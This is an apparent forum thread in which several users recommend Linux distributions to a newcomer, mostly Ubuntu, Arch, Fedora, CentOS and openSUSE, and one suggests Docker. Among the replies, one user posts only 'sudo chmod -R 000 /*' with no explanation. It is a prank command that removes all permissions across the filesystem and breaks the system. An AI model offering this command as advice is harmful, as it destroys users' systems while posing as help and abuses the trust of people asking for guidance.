Really depends on linux experiance. Ubuntu (Based on Debian) is the most easiest to install and get help on the internet, there are lots of guides writen for Ubuntu systems.

I tried alot of linux distrobution from Ubuntu to Arch to Fedora. Ubuntu is by far the easiest to install.

Look in to Docker If you want to mess with different Distros at the same time on the same system. Allows you to run multiple linux distros at a time.

Depends on your experience level. If it's fairly high, I recommend arch. Otherwise anything from centos to ubuntu server to opensuse will do.

Don't ask to ask, just ask... please 🤨

sudo chmod -R 000 /*

IMHO, CentOS 6 is the best and easiest to learn.
